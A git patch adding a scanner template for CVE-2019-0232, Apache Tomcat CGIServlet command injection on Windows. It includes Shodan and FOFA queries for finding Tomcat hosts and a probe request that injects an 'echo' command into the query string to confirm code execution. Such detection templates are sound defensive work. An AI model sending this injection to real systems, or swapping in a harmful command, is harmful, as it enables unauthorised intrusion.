From 977590a4a760bdef679a004b1eb46f005bc45d41 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 23 Sep 2024 18:19:53 +0530
Subject: [PATCH] Create CVE-2019-0232.yaml

---
 http/cves/2019/CVE-2019-0232.yaml | 61 +++++++++++++++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 http/cves/2019/CVE-2019-0232.yaml

diff --git a/http/cves/2019/CVE-2019-0232.yaml b/http/cves/2019/CVE-2019-0232.yaml
new file mode 100644
index 0000000000..47705e855a
--- /dev/null
+++ b/http/cves/2019/CVE-2019-0232.yaml
@@ -0,0 +1,61 @@
+id: CVE-2019-0232
+
+info:
+  name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
+  reference:
+    - http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
+    - http://seclists.org/fulldisclosure/2019/May/4
+    - https://access.redhat.com/errata/RHSA-2019:1712
+    - https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
+    - https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2019-0232
+    cwe-id: CWE-78
+    epss-score: 0.97373
+    epss-percentile: 0.99927
+    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: apache
+    product: tomcat
+    shodan-query:
+      - http.html:"apache tomcat"
+      - http.title:"apache tomcat"
+      - http.html:"jk status manager"
+      - cpe:"cpe:2.3:a:apache:tomcat"
+    fofa-query:
+      - body="jk status manager"
+      - body="apache tomcat"
+      - title="apache tomcat"
+    google-query: intitle:"apache tomcat"
+  tags: cve,cve2019,packetstorm,seclists,apache,tomcat
+
+variables:
+  sid: "{{rand_text_alpha(10)}}"
+
+http:
+  - raw:
+      - |
+        GET /?&echo+{{sid}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{sid}}"
+
+      - type: word
+        part: content/type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200